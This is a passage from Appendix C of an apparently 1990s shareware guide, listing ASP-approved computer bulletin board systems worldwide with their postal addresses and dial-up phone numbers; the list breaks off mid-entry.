Appendix C, "Bulletin Boards" 726 + + + + + + Appendix C + Bulletin Boards + + This appendix lists each ASP-approved computer bulletin board + system (BBS). These BBSs have agreed to abide by ethical stan- + dards when offering shareware. + + Set your communications software to "8 data bits, no parity, 1 + stop bit" before calling any of these BBSs. + + + $ensible $oftware BBS + Address: 1840 Cleek Ct., Orlando Fl 32835 + BBS Phone: 407-298-5830 + + **CCAT** + Address: 11326 DEW CREEK CIRCLE, CORPUS CHRISTI TX 78410 + BBS Phone: 512-242-2206 + + /\ssisT-ON-Line + Address: c/o DaS Procuction, Via Giusti 15 a/b, Firenze 50121 + ITALY + BBS Phone: 39-55-2340486 + th + 24 Street Exchange + st + Address: 1507 21 Street Suite 107, Sacramento CA 95814 + BBS Phone: 916-448-2483 + + A Community BBS + Address: 317 E Palm, Monrovia CA 91016 + BBS Phone: 818-358-3811 + + A to Z Tech Line + th + Address: 21024 SE 269 , Kent WA 98042 + BBS Phone: 206-432-4732 + + Access BBS + Address: PO Box 373, Ballston Spa NY 12020 + BBS Phone: 518-885-4192 + + Ace-Station- BBS + Address: 9401 Orion Ave, North Hills CA 91343 + BBS Phone: 818-891-0397 + + Active-Net BBS + Address: Eschenweg 4, JONA 8645 SWITZERLAND + BBS Phone: 41-55-261-815 + + Appendix C, "Bulletin Boards" 727 + + + + Acumen BBS + Address: 632 Simpson St, Thunder Bay ON P7C 3J7 CANADA + BBS Phone: 807-626-9339 + + Adams Dynamic Storefront + Address: PO Box 787, Herndon VA 22070-0787 + BBS Phone: 703-716-1256 + + Advantage On-Line Business + Address: 16498 Howard Dr, Macomb MI 48042-5785 + BBS Phone: 810-781-8601 + + AIS MULTILINE + Address: 16 A 11th Ave S, Cranbrook BC V1C 4H7 CANADA + BBS Phone: 604-489-4206 + + Alien Space Ship + Address: 623 Elm Street, Shelbyville IN 46176-2011 + + Alpha City BBS + Address: 59 Gatineau St, Oshawa ON L1H 7G2 CANADA + BBS Phone: 905-579-6302 + + AlphaOne Online + Address: 8926 N Greenwood Ave # 229, Niles IL 60714 + BBS Phone: 708-827-3619 + + Altair Data System + Address: Via Guarini Matteucci N'1, 20162 Milano Mi, ITALY + BBS Phone: 39 2 6420515 + + Alternatives PLUS, Inc + Address: PO Box 11931, Wilmington DE 19850 + BBS Phone: 302-328-0381 + + AMCOM + Address: PO BOX 41164, Cleveland OH 44141 + BBS Phone: 216-526-9480 + + America's Suggestion Box + Address: 101 Locust Blvd, Ronkonkoma NY 11779 + BBS Phone: 516-471-8625 + + Anglers Roost BBS + Address: 7105 L Rockridge Lane, Alexandria VA 22315 + BBS Phone: 703-971-4441 + + Apartment 2 + Address: PO BOX 303, Glen Oaks NY 11004-0303 + BBS Phone: 718-347-1075 + + Aquarius BBS + Address: 1206 Lackey Street, Paducah KY 42003-3472 + BBS Phone: 502-443-4707 + + Appendix C, "Bulletin Boards" 728 + + + + Archives BBS + Address: 100 Nestles Lane, Acushmet MA 02743 + BBS Phone: 508-995-0085 + + Argus Computerized Exchange + Address: PO Box 621, Lexington MA 02173 + BBS Phone: 617-862-9373 + + Arkansas River Valley + Address: 136 Vance Lane, Russellville AR 72801 + BBS Phone: 501-968-1931 + + Artist On-Line Info Sys + Address: Blk 458 Ang Mo Kio #14-1584, SINGAPORE 2056 SINGAPORE + BBS Phone: 65 456-1100 + + AspenWood BBS + Address: 1220 S Parker Rd #110, Denver CO 80231 + BBS Phone: 303-388-0336 + + At The GIFfer's + Address: 4577 Gunn Highway Ste 170, TAMPA FL 33624 + BBS Phone: 813-969-2761 + + At the Mountain BBS + Address: 5935 E Vermillion ST, Mesa AZ 85215 + BBS Phone: 602-981-3591 + + AT&T EasyLink Service + Address: 2800 Century Ctr Pkwy RM 510-B, Atlanta GA 30345 + BBS Phone: 800-624-5123 + + ATAB BBS + Address: PO BOX 2542, DARTMOUTH NS B2W 4B7 CANADA + BBS Phone: 902-435-0751 + + Atomic Dog BBS + Address: PO Box 523, Medford MA 02155-0004 + BBS Phone: 617-279-3561 + + Attard Communications + Address: 20 Fairway Dr, Centereach NY 11720 + BBS Phone: 800-638-8369 + + Attention to Details BBS + Address: 5085 Trail Canyon Drive, Mira Loma CA 91752-1685 + BBS Phone: 909-681-6221 + + Jorge, Antonio M. + Address: Apartado 4438, Lisboa Codex 1509 PORTUGAL + BBS Phone: 351-1-4919755 + + Appendix C, "Bulletin Boards" 729 + + + + BackTrackers + Address: 124 Bittersweet Lane, Lansing KS 66043-1401 + BBS Phone: 913-727-2043 + + BBS 2000 + Address: C.so Vitt. Emanuele 15, Milano 20122 ITALY + BBS Phone: 39 2 781147 + + BBS Express + Address: PO Box 4505, Santa Rosa CA 95402 + BBS Phone: 707-571-7526 + + BBS Waterland + Address: PO Box 1196, 1440 BD PURMEREND NETHERLANDS + BBS Phone: 31299040303 + + Beyond The Realm + Address: 747 Calle Portilla, Camarillo CA 93010-9207 + BBS Phone: 805-987-5506 + + Bill's BBS + Address: 9512 Dongate Ln, Knoxville TN 37931 + BBS Phone: 615-694-8757 + + Bits N' Bytes BBS + Address: PO Box 8194, Winslow ME 04901 + BBS Phone: 207-873-1937 + + Bluegrass RBBS + Address: 686 Sheridan Dr, Lexington KY 40503-1726 + BBS Phone: 606-272-0499 + + BlueMax + Address: 213 Bessborough Ave, Moncton NB E1E 1R3 CANADA + BBS Phone: 506-382-9220 + + Boardwalk BBS + Address: 520 University Ave Ste 110C, Madison WI 53703 + BBS Phone: 608-257-0486 + + Boardwatch Magazine BBS + Address: 5970 South Vivian Street, Littleton CO 80127 + BBS Phone: 303-973-4222 + + BorderTown BBS + Address: 332 East Main ST, Westminster MD 21157 + BBS Phone: 410-876-5101 + + Buller BBS + Address: Angelholmsvagen 76, 26937 Bastad, SWEDEN + BBS Phone: 46-431-70909 + + Appendix C, "Bulletin Boards" 730 + + + + Business Solutions BBS + Address: Box 358, RPO University, Saskatoon SK S7N 4J8 CANADA + BBS Phone: 306-653-1664 + + C.C.N. + Address: 1725 W Burlington Place, Denver CO 80221-1059 + BBS Phone: 303-477-0356 + + Cadmos / CHAOS + Address: Skoufa 26, Athens 106 73 GREECE + BBS Phone: 301-360-6044 + + Cape Fear BBS + Address: 1140 Sloop Point Rd, Hampstead NC 28443-8640 + BBS Phone: 910-270-3174 + + Capitol Area Network + Address: 10829 Golf Course Terrace, Mitchellville MD 20721 + BBS Phone: 301-499-4671 + + Cappuccano Cafe + Address: 2624 E Mendota Drive, Boise ID 83705-6873 + BBS Phone: 208-467-4110 + + CATS-BBS + Address: Parque Residencial, S. Sebastiao, BL 3-R/C ESQ., 2655 + Ericeira PORTUGAL + BBS Phone: 351 061865656/818 + + CBUG BBS + Address: PO BOX 125, COLUMBIA MD 21045 + BBS Phone: 301-750-1253 + + Central Europe BBS + Address: Hansastr. 25, Furth D-90766 GERMANY + BBS Phone: 49-911-97344-44 + + Channel 1 Communications + Address: PO BOX 338, Cambridge MA 02238 + BBS Phone: 617-354-3230 + + Channel V + Address: PO Box 5320, Herzelyia 46152 ISRAEL + BBS Phone: 972-9-503801 + + Charleston Communications Inc. + Address: PO Box 85178, Las Vegas NV 89185-0178 + BBS Phone: 702-386-7979 + + ChatterBox + Address: 26 Cygnet Close, Larkfield AylesFord KENT ME20 6QH + U.K. + BBS Phone: 44 732-870941 + + Appendix C, "Bulletin Boards" 731 + + + + Chicago Syslink + Address: 1643 SOUTH GUNDERSON AVE, BERWYN IL 60402 + BBS Phone: 708-795-4442 + + Chip -N- Disk BBS + Address: PO Box 89, Trevor WI 53179-0089 + BBS Phone: 414-862-6221 + + Classified Connection + Address: PO Box 50047, San Diego CA 92165 + BBS Phone: 619-566-5516 + + Clavius + Address: C/ Francos Rodriquez 42,20, Madrid 28039 SPAIN + BBS Phone: 34-1-3112371 + + Cliffside BBS + Address: PO Box 215, Cliffside NC 28024 + BBS Phone: 704-657-4154 + + Cliffside Park BBs + Address: 141 Gaisler Road, Blairstown NJ 07825 + BBS Phone: 908-362-6907 + + CLUB PC BBS + Address: 1217 Crescent Drive, Smithfield VA 23430 + BBS Phone: 804-357-0357 + + Collector's Edition + Address: 3733 Rockdale Dr, Dallas TX 75220-1863 + BBS Phone: 214-351-9859 + + Colligatarch Authority + Address: 3392 E US-2, Iron River MI 49935 + BBS Phone: 906-265-0037 + + ComPart BBS + Address: Takomotie 11, HELSINKI FIN 00380 FINLAND + BBS Phone: 358 0 506 3329 + + CompuBasix + Address: PO Box 8169, Corpus Christi TX 78468-8169 + BBS Phone: 512-994-8300 + + CompuServe PCNet-Online + Address: 1705 Barclay Drive, Austin TX 78746 + + Computer Junction + Address: 212 Browning Ave, Elizabeth NJ 07208 + BBS Phone: 908-354-6979 + + Appendix C, "Bulletin Boards" 732 + + + + Computer Link + Address: 5150 Dundas Street West #306, Etobicoke ON M9A 1C3 + CANADA + BBS Phone: 416-233-5410 + + Computer Support Hot-Line + th + Address: 3805 9 St, Des Moines IA 50313-3342 + BBS Phone: 515-246-1353 + + Computer Users Exchange (CUE) + Address: 1710 SW 33ST, Topeka KS 66611-2504 + BBS Phone: 913-267-1903 + + Computrol BBS + Address: PO Box 281, Hornsby NSW 2077 AUSTRALIA + BBS Phone: 61-2-489-6848 + + Connect Ireland + Address: 20 Mark Street, Dublin 2 IRELAND + BBS Phone: 353-1-6711687 + + Construction Net #6 + Address: PO Box 1418, Los Alamos NM 87544 + BBS Phone: 505-662-0659 + + Conway PC Users Group BBS + Address: PO BOX 10442, Toadsuck Station, Conway AR 72032 + BBS Phone: 501-329-7227 + + County Seat BBS + Address: 105 N River Road # 111, Mt Clemens MI 48043-1927 + BBS Phone: 810-468-2625 + + CRIS + st + Address: 400 41 St, Bay City MI 48708 + BBS Phone: 517-895-0510 + + Crossroads, BBS + Address: PO Box 1022, Lexington SC 29071-1022 + BBS Phone: 803-957-7077 + + Crystal Mountain BBS + Address: 402 Chestnut Hill Ave, Athol MA 01331 + BBS Phone: 508-249-2156 + + CyberCity BBS + Address: 219 Du Vallon, Aylmer QB J9J 1N9 CANADA + BBS Phone: 819-684-8232 + + Cyberia Communications, Inc + Address: One Market Way East, York PA 17401 + BBS Phone: 717-848-1666 + + Appendix C, "Bulletin Boards" 733 + + + + Dagan Software BBS + Address: 8130 Dagan St, Anchorage AK 99502 + BBS Phone: 907-248-8130 + + Danish Key Board BBS + Address: Vesterbrogade 171, Frederiksberg C DK-1800 DENMARK + BBS Phone: 45-332-55600 + + Darin + Address: PO Box 202, Qatif 31911, SAUDI ARABIA + BBS Phone: 966-3-855-2131 + + Data-Base BBS + Address: 3 Grandin Drive, Annandale NJ 08801-3346 + BBS Phone: 908-735-2180 + + Dataland BBS + Address: 7303 Hana Rd, Edison NJ 08817 + BBS Phone: 908-572-5762 + + DataLynx BBS + Address: Capri Electronics Corp, PO Box 589, Bayfield CO + 81122-0589 + BBS Phone: 970-884-6001 + + Deep Cove BBS + Address: PO Box 45504, Sunnyside Mall PO, Surrey BC V4A 9N3 + CANADA + BBS Phone: 604-536-5885 + + Del Ches Systems BBS + Address: 11 Andover Drive, Exton PA 19341 + BBS Phone: 610-363-6625 + + Destination CPU + Address: PO Box 906, Elmira NY 14902-0906 + BBS Phone: 607-737-6901 + + DFG Financial BBS + Address: PO Drawer 4006, 606 North Eighth Street, Opelika AL + 36803-4006 + BBS Phone: 334-745-0579 + + Direct Connect + Address: PO Box 6684, Philadelphia PA 19149 + BBS Phone: 215-535-1917 + + DR. SNED'S RBBS-IN-A-BOX + Address: RT # 1 BOX 232, San Mateo FL 32187-9801 + BBS Phone: 904-325-6558 + + DreamLine II BBS + Address: 10 Pleasant Rd, Norristown PA 19401 + BBS Phone: 610-279-2760 + + Appendix C, "Bulletin Boards" 734 + + + + DSC BBS + Address: 17 Richard Rd, Ivyland PA 18974-1512 + BBS Phone: 215-443-9434 + + DTEL + Address: 1832 North DuPont Highway, Dover DE 19901 + BBS Phone: 302-739-2818 + + Electro-Technika + Address: P.O. Box 8210, Colorado Springs CO 80933-8210 + BBS Phone: 719-380-0541 + + EmmaSoft Software Company, Inc + Address: PO BOX 238, LANSING NY 14882-0238 + BBS Phone: 607-533-7072 + + Europa BBS + Address: Nicolasa Gomez, 80 B, 28022 MADRID SPAIN + BBS Phone: 34-1-320-8460 #2 + + Event Horizons + th + Address: 530 4 St #B, Lake Oswego OR 97034-3006 + BBS Phone: 503-697-5100 + + Evergreen BBS + Address: 104 Evergreen Ave, Hopatcong NJ 07843 + BBS Phone: 201-398-2373 + + Excalibur + Address: 36450 Farmbrook Drive, Bldg 51, Clinton Township MI + 48035 + BBS Phone: 810-792-9078 + + Exec-PC + th + Address: 2105 S 170 Street, New Berlin WI 53151 + BBS Phone: 414-789-4210 + + Express Net + Address: 11155 Wilshire Chase Drive, Duluth GA 30136 + BBS Phone: 404-410-9139 + + Family-Net bbs + Address: 11693 N. Shore Drive Apt 22C, Reston VA 22090 + BBS Phone: 703-787-6708 + + Fantasy Land + Address: 2404 South Sixth, Springfield IL 62703 + BBS Phone: 214-535-1005 + + File World BBS + Address: PO Box 901, Georgetown KY 40324 + BBS Phone: 502-867-1800 + + Appendix C, "Bulletin Boards" 735 + + + + Flix Pages & Tunes + Address: 4 Briar Lane, Weston MA 02193-1465 + BBS Phone: 617-235-0789 + + Full Connection BBS + Address: Caixa Postal 108, Santo Andre - SP BRAZIL + BBS Phone: 011 440 7204 + + Games R' Us + Address: 1314 Sycamore Street, Norman OK 73072 + BBS Phone: 405-447-7954 + + Gateway Online + Address: PO Box 82, Rockwood MI 48173 + BBS Phone: 313-297-5571 + + Gateway Software BBS + Address: 1230 Market Street Ste 402, San Francisco CA 94102 + BBS Phone: 415-885-1392 + + GEnie IBM R/T + Address: 100 Bleecker St #19E, New York NY 10012 + BBS Phone: 800-638-9636 + + GeoFract BBS + Address: 17729 Devall Road, Spencerville IN 46788-9202 + BBS Phone: 219-627-3309 + + Geowiz + Address: PO Box 540, Toormina NSW 2452 AUSTRALIA + BBS Phone: 066-584-396 + + GLIB + Address: PO BOX 636, ARLINGTON VA 22216 + BBS Phone: 703-578-4542 + + HACOM BBS + Address: A.Blankaartsingel 113, Amersfoort 3813-PA NETHERLANDS + BBS Phone: 31-33-803610 + + HAL 9000 BBS + Address: 5145 Pontiac Trail, Ann Arbor MI 48105-9627 + BBS Phone: 313-663-4173 + + Hamster BBS + Address: ZIMMERSTRASSE 9, 58638 ISERLOHN GERMANY + BBS Phone: 49 237114490 + + HAWG WILD! BBS, INC. + Address: PO BOX 540691, OMAHA NE 68154 + BBS Phone: 402-493-2737 + + Appendix C, "Bulletin Boards" 736 + + + + Hawk's Castle + Address: 61 Juniper, Birch Hill, Bracknell BERKS RG12 7ZF U.K. + BBS Phone: 344 411621 + + Hermes Center BBS + Address: Boite Postale N.3, Quincy Sous Senart 91480 FRANCE + BBS Phone: 331 69007672 + + Hi-Desert Hangout + Address: Suite H-125, 3053 Rancho Vista Blvd, Palmdale CA + 93551 + BBS Phone: 805-722-5758 + + Hogard Software Solutions + Address: 4533 Marblearch Dr, Grand Prairie TX 75052 + BBS Phone: 214-641-6292 + + Hollywood News/Info System + Address: PO Box 366, Hollywood MD 20636 + BBS Phone: 301-373-3530 + + Horse Feathers BBS + Address: 35123 Ravine Ln, Ingleside IL 60041 + BBS Phone: 708-587-9214 + + Hottips BBS Glendale + Address: PO Box 764, La Canada CA 91012 + BBS Phone: 818-248-3088 + + HouseNet BBS + Address: PO Box 520, St Michaels MD 21663 + BBS Phone: 410-745-2037 + + HSX Support Groups + Address: 132 Hutchin Hill Rd, Shady NY 12409 + + Hubert Middle School + Address: 768 Grant Street, Savannah GA 31499 + BBS Phone: 912-651-5632 + + HUG & Lincoln Software + Address: 1136 SUNNYSIDE DRIVE, HAGERSTOWN MD 21742-3044 + BBS Phone: 301-733-6456 + + Icaro BBS + Address: c/o Luis de Salazar, 9 5C, MADRID 28002 SPAIN + BBS Phone: 011-34-1-519-4645 + + iLink Information Service + Address: Flt D, 20/F, Blk 6, Phase 2, Belvedere Garden, TSUEN + WAN HONG KONG HONG KONG + BBS Phone: 852-611-9399 + + Appendix C, "Bulletin Boards" 737 + + + + Impact! Online + Address: 8855 SW Brabham Way, Gaston OR 97119 + BBS Phone: 503-985-3408 + + INFO-CENTER BBS + Address: De Hassels 2, B-2400 MOL BELGIUM + BBS Phone: 32 14 311 455 + + Infonet Services + Address: Bally Curreen Estate, Kinsale Road, CORK IRELAND + BBS Phone: 353-21-310170 + + Bazan, Carlos + Address: APDO POSTAL 105-60, Mexico City CP 11581 MEXICO + BBS Phone: 525-525-3732 + + Inter-Connexions + Address: 123, rue Valin, Hull QC J8Y 4W3 CANADA + BBS Phone: 819-776-0088 + + Interact BBS + Address: Blk 228 Pasir Ris St 21, #09-08, Singapore 1851 + SINGAPORE + BBS Phone: 65 581 7024 + + Intercity BBS + Address: 4615 PATTERSON AVE, RICHMOND VA 23226-1341 + BBS Phone: 804-353-4160 + + Jacob's House BBS + Address: 1101 S Stadium, Alice TX 78332 + BBS Phone: 512-664-7570 + + JADE + Address: 416 Colby Ct, Janesville WI 53546 + BBS Phone: 608-757-3000 + + JAPCUG + Address: 1804 Chapin St, Jackson MI 49203-1804 + BBS Phone: 517-789-7556 + + JBJ Systems PC Board BBS + Address: 1549 Methyl Street, Pittsburgh PA 15216 + BBS Phone: 412-341-9323 + + Jezebel's Parlour BBS + Address: 276 Pleasant Hill Rd, Flanders NJ 07836 + BBS Phone: 201-927-2932 + + Jims' PC Paradise + Address: 87-26 56 Avenue, Elmhurst NY 11373 + BBS Phone: 718-458-0502 + + Appendix C, "Bulletin Boards" 738 + + + + JIX BBS + Address: 2-7-12 Higashi-Tenma, KITA-KU OSAKA 530 JAPAN + BBS Phone: 06 351-6074 + + JUPITER BBS + Address: PO BOX 935, JUPITER FL 33468-0935 + BBS Phone: 407-575-3853 + + Just Programs BBS + Address: 313 West Webster Ave, Roselle Park NJ 07204 + BBS Phone: 908-298-9098 + + KBTC BBS + Address: 407 SOUTH HILBORN AVE, WEST COVINA CA 91791 + BBS Phone: 818-967-0701 + + Kitty's Cafe! BBS + Address: 213 Highland Drive, Warner Robins GA 31088 + BBS Phone: 912-328-9909 + + Knight Light PCB BBS + Address: Hugoverrieststraat 34, Pl Tilburg 5044 NETHERLANDS + BBS Phone: 31-13-678227 + + Knightec BBS + Address: 35 Rorb Blvd #6, Orangeville ON L9W 3L1 CANADA + BBS Phone: 519-940-0007 + + Koeltz Scientific Books USA + Address: 1911 North Duncan Road, Champaign IL 61821 + BBS Phone: 217-355-4532 + + KSI Public BBS + Address: 305 N Walnut St, PO Box 395, Walton IN 46994 + BBS Phone: 219-626-2150 + + L.I.N.E. + Address: PO Box 19, Greenlawn NY 11740 + BBS Phone: 516-261-9701 + + Lakeside Wildcat! BBS + Address: 9717 Caraway Court, Lakeside CA 92040-4225 + BBS Phone: 619-390-7328 + + Last Chance TBBS + Address: PO Box 2536, Universal City TX 78148 + BBS Phone: 210-822-7519 + + Late Nite DIVERSIONS + Address: #2-1200 London Road Ste 241, Sarnia ONT N7V 2B9 + CANADA + BBS Phone: 519-332-0241 + + Appendix C, "Bulletin Boards" 739 + + + + Lighthouse BBS + Address: 500 NORTHGATE DR, DYER IN 46311 + BBS Phone: 219-864-1066 + + Live Wire BBS + Address: C-503, Eden-4, Hiranandani Garden, Powai, Bombay + 400076 INDIA + BBS Phone: 91-22-5787812 + + Live Wire BBS Calcutta + Address: C/O M.L. Khemka & Sons, 4 Floor,6OLD Post Office St, + Calcutta - 1 INDIA (W.B.) + BBS Phone: 33-2481356 + + Long's Peak BBS + th + Address: 1820 17 Ave, Longmont CO 80501 + BBS Phone: 303-772-7921 + + LoperNet BBS + Address: 311 West 11th Street, PO Box 1004, Kearney NE + 68848-1004 + BBS Phone: 308-234-2247 + + Magpie BBS + Address: 301 East Main St, CROTHERSVILLE IN 47229 + BBS Phone: 812-793-2237 + + Mainstreet Online + Address: 502 Fontanelle Ct, San Jose CA 95111-1712 + BBS Phone: 408-224-7523 + + mAp/LZ + Address: 6049 Dwight, Dearborn Hgts MI 48127 + BBS Phone: 313-563-8940 + + McBaud! BBS + Address: Adenauerlaan 84, 3137 JA Vlaardingen, NETHERLANDS + BBS Phone: 31 10-4752961 + + Media Concept BBS + Address: RUE DE SAINT LEGER 40, LUSTIN B-5170 BELGIUM + BBS Phone: 011 32 411300 + + MegaSystem + Address: 1335 Greg St Ste 103, Sparks NV 89431 + BBS Phone: 702-359-2666 + + Mercury Opus + Address: 4301 11th Avenue N, St Petersburg FL 33713-5207 + BBS Phone: 813-321-0734 + + Appendix C, "Bulletin Boards" 740 + + + + MetroPitt BBS + Address: 125 John Giel Drive, Glenshaw PA 15116-2803 + BBS Phone: 412-487-9223 + + Micro Message Service (MMS) + Address: 1464 Garmer Station Blvd, Suite 100, Raleigh NC 27603 + BBS Phone: 919-779-6647 + + Microlink D + Address: 12244 Applewood Knolls Dr, Lakewood CO 80215 + BBS Phone: 303-237-8575 + + MicroMetric Support BBS + Address: 98 Dade Ave, Sarasota FL 34232-1609 + BBS Phone: 813-371-2490 + + MidEast Connection BBS + Address: PO Box 56496, Riyadh 11554 SAUDI ARABIA + BBS Phone: 966 1-441-0075 + + Midwest Data Exchange + Address: 119 S Main, Aberdeen SD 57401 + BBS Phone: 605-226-2428 + + MindWare Online + Address: PO Box 365, Berkeley CA 94701 + BBS Phone: 510-843-8071 + + Mortgage Market On-Line + Address: 53 E St Charles Rd, Villa Park IL 60181 + BBS Phone: 708-834-1450 + + Mr Wonderful's Lair + Address: 670 South Anderson St, Los Angeles CA 90023 + BBS Phone: 213-261-8055 + + MSmac BBS + Address: Rua Princesa Benedita n-4 1-dr, Torres Vedras 2560 + PORTUGAL + BBS Phone: 351-61-314336 + + MSN Shareware Forum + th + Address: 2526 69 Ave S, St Petersburg FL 33712-5631 + + MultiServer + Address: Schubertstraat 38, 8031 ZE Zwolle NETHERLANDS + BBS Phone: 31-38-541358 + + MultiSystem TBBS + Address: 2524 ELMDALE DRIVE, CINCINNATI OH 45230-1213 + BBS Phone: 513-231-7013 + + Appendix C, "Bulletin Boards" 741 + + + + Multiverse + th + Address: 1965 East 6 St Ste 610, Cleveland OH 44114 + BBS Phone: 216-644-6776 + + Murphy BBS + Address: Carrer Nou, 57 Atic, 08291 Ripollet (BCN) 08291 SPAIN + BBS Phone: 34-3-580-85-15 + + My Computer Company + Address: PO Box 99, 25 Albert St, Erskineville NSW 2043 + AUSTRALIA + BBS Phone: 612-565-1044 + + My Home BBS! + Address: PO Box 16203, Augusta GA 30919-2203 + BBS Phone: 706-733-1124 + + NAFI On-line + Address: PO Box 957257, 2155 Stonington Ave # 118, Hoffman + Estates IL 60194 + BBS Phone: 708-885-9305 + + NCS Cape Town + Address: 57 Bedford St, Parow CAPE TOWN 7500 SOUTH AFRICA + BBS Phone: 27-21-930-4654 + + Networking BBS + Address: Zoss Communications Inc, 714 East La Salle Avenue, + South Bend IN 46617 + BBS Phone: 219-288-1402 + + New Horizons BBS + Address: 12627 Kornett Lane, Bowie MD 20715 + BBS Phone: 301-805-8910 + + Nice Day BBS + Address: Lerchenstrasse 15, 4132 Muttenz SWITZERLAND + BBS Phone: 41-61-463-0321 + + Night Dream BBS + Address: Naestvedvej 24, VORDINBORG DK-4760 DENMARK + BBS Phone: 45 55340404 + + Night Voyager BBS + Address: E 16406 20TH CT, Veradale WA 99037 + BBS Phone: 509-926-1686 + + Nite-Air BBS System + Address: RD 2, Box 457, Bartlett Road, Rome NY 13440 + BBS Phone: 315-339-8831 + + Appendix C, "Bulletin Boards" 742 + + + + NJ Computer Connection + Address: PO BOX 6909, Lawrenceville NJ 08648 + BBS Phone: 609-895-0398 + + NJPCUG + Address: PO BOX 14, Paraums NJ 07653-0014 + BBS Phone: 201-835-3122 + + Node Dakota BBS + Address: 1911 San Diego Dr, Bismarck ND 58504-7222 + BBS Phone: 701-224-1431 + + NORDIC Enterprises EDMS + Address: PO BOX 509, Ipswich MA 01938 + BBS Phone: 508-356-1166 + + Northern Computer Services + Address: PO Box 45, Glenroy Melborne VIC 3046 AUSTRALIA + BBS Phone: 61-3-306-5130 + + Northern Exposure + Address: 43 Primrose Crescent, Fulwell SUNDERLAND SR6 9RJ + ENGLAND + BBS Phone: 44 91-548-0892 + + Nucleus Information Service + th + Address: 1835 B 10 Ave SW, Calgary Alberta T3C 0K2 CANADA + BBS Phone: 403-541-9400 + + O'B 1 + Address: 515 Lakeside Suite 209, East Grand Rapids MI 49506 + BBS Phone: 616-336-8020 + + OBSdata-BBS + Address: Nuevo Chilches 3 Nr.5, Chilches-Malaga 29760 SPAIN + BBS Phone: 34-95-251-4228 + + OMEGA-ONE BBS + Address: PO Box 1416, Corinth MS 38834-1416 + BBS Phone: 601-287-1336 + + Online Systems of Canada + Address: 383 Richmond Street, Ste 900, London ON N6A 3C4 + CANADA + BBS Phone: 519-642-0700 + + Opus Networx + th + Address: PO Box Int'l #4N-1223, 8340 NW 56 Street, Miami FL + 33166 + BBS Phone: 809-628-5023 + + Appendix C, "Bulletin Boards" 743 + + + + OTB Communication System + Address: 14-121 Ripley Court, Oakville ON L6H 1H2 CANADA + BBS Phone: 905-844-2483 + + Our Town OnLine + Address: 240 Clipper Way, Seal Beach CA 90740 + BBS Phone: 310-799-8553 + + P & A BBS + Address: 302 Bellwins 1367-23, Nakagami Akishima TOKYO 196 + JAPAN + BBS Phone: 81 425-46-9143 + + P&G Enterprises + Address: 1106 Oak, Duncan OK 73533 + BBS Phone: 405-255-6897 + + Pacific Rim Information + Address: 4580 Mt Alifan Drive, San Diego CA 92111-2504 + BBS Phone: 619-278-7361 + + Panama ShareWare + Address: 8501 N Logoon #307, PANAMA CITY BEACH FL 32408 + BBS Phone: 904-235-3634 + + PC PULSE + Address: PO Box 2265, BRENERTON WA 98310 + BBS Phone: 206-377-8508 + + PC Shop + Address: 37 Jalan Silang, Kuala Lumpur 50050 MALAYSIA + BBS Phone: 603-957-4373 + + PC-Cubed + Address: 35 Charit Way, Rochester NY 14626-1101 + BBS Phone: 716-723-8489 + + PC-DSD Direct Access BBS + Address: 1254 Elden Ave, Los Angeles CA 90006 + BBS Phone: 213-384-0809 + + PC-Monitor + th + Address: PO Box 5, 305 East 6 St, Albert Lea MN 56007 + BBS Phone: 507-373-1100 + + PC-Ohio + Address: 23749 CEDAR ROAD, CLEVELAND OH 44122-1069 + BBS Phone: 216-381-3320 + + Peace Connection BBS + Address: Franciscan Friars, 329 Poplar at Cedar Sts, Hazard KY + 41701-1541 + BBS Phone: 606-439-1743 + + Appendix C, "Bulletin Boards" 744 + + + + Pennsylvania OnLine! + Address: PO Box 6501, Harrisburg PA 17112 + BBS Phone: 717-657-8699 + + Pistonhead + Address: 2115 Lennox Rd, Richmond VA 23228-6038 + BBS Phone: 804-262-4036 + + PJ Systems + Address: 7290 Britton Hwy, Britton Mi 49229 + BBS Phone: 517-451-2072 + + Po' Boy's BBS + Address: PO Box 6305, Montgomery AL 36106-0305 + BBS Phone: 205-271-3545 + + Prime Cut BBS + Address: 13 Kirkbrae Drive, Lincoln RI 02865-1007 + BBS Phone: 401-334-3096 + + Prime Time BBS + Address: PO Box 6997, BURBANK CA 91510 + BBS Phone: 818-982-7271 + + PrometheuS + Address: via Podgora 132, 70124 Bari ITALY + BBS Phone: 39-80-551-5278 + + Psychobabble + Address: 481 Cypress Lane J-179, Greenville MS 38701 + BBS Phone: 601-332-9453 + + PUMA Wildcat! + Address: PO BOX 13231, Alexandria LA 71315 + BBS Phone: 318-443-1065 + + Puss N Boots + Address: PO Box 832556, Richardson TX 75083 + BBS Phone: 214-437-0688 + + QuickSilver + Address: D&R Enterprises, PO BOX 94318-503, Las Vegas NV + 89193-4318 + BBS Phone: 702-384-8503 + + R.B. Enterprises + th + Address: 711 East 134 Street, Bradenton FL 34202 + BBS Phone: 813-748-5380 NP + + RadioComm + Address: PO Box 633, Park Ridge IL 60068 + BBS Phone: 708-518-8336 + + Appendix C, "Bulletin Boards" 745 + + + + Rama One BBS + th + Address: 73-35 70 Street, Glendale NY 11385 + BBS Phone: 718-366-6165 + + Rapid River BBS + Address: 6848 Highway 34, Rudolph WI 54475-9531 + BBS Phone: 715-435-3855 + + Real Estate Online + Address: 710 Main St, Huntington Beach CA 92648 + BBS Phone: 714-969-9624 + + Redwood 101 + Address: 9621-C North State Street, Redwood Valley CA 95470 + BBS Phone: 707-485-7843 + + RunWay BBS + Address: PO Box 0941, Lansdowne PA 19050 + + Sable OnLine! + Address: PO Box 5011, Gardena CA 90249-5011 + BBS Phone: 310-768-8362 + + Sac BBS + Address: Eset s.r.o. Ondavska 3, 826 47 Bratislava SLOVAKIA + BBS Phone: 42-7-204-8232 + + Sales Automation Success! + Address: 2815 NW Pime Cone Drive, Issaquah WA 98027-8698 + BBS Phone: 206-392-8943 + + Seascape! BBS + Address: PO BOX 326, MOREHEAD CITY NC 28557 + BBS Phone: 919-726-9364 + + Servant of the Lord + Address: 6113 W RIVER ROAD, MATOACA VA 23803-8047 + BBS Phone: 804-590-2161 + + SFE Systems BBS + Address: PO Box 4655, Huntsville AL 35815 + BBS Phone: 205-650-0107 + + Shadow's Palace BBS + Address: 11501 NE 11th Place, Biscayne Park FL 33161 + BBS Phone: 305-895-4688 + + Sharpenit! RBBS + Address: 65 Valentine Street, Agawam MA 01001 + BBS Phone: 413-786-4706 + + Appendix C, "Bulletin Boards" 746 + + + + Sigma Industries BBS + Address: 800 S. Main St, Lakeport CA 95453 + BBS Phone: 707-263-8582 + + SIGMA IOTIA RBBS + Address: 4006 Desert Drive, Pasco WA 99301 + BBS Phone: 509-965-0467 + + Silicon Tundra BBS + Address: PO Box 97, Munster Hamlet ON KOA 3PO 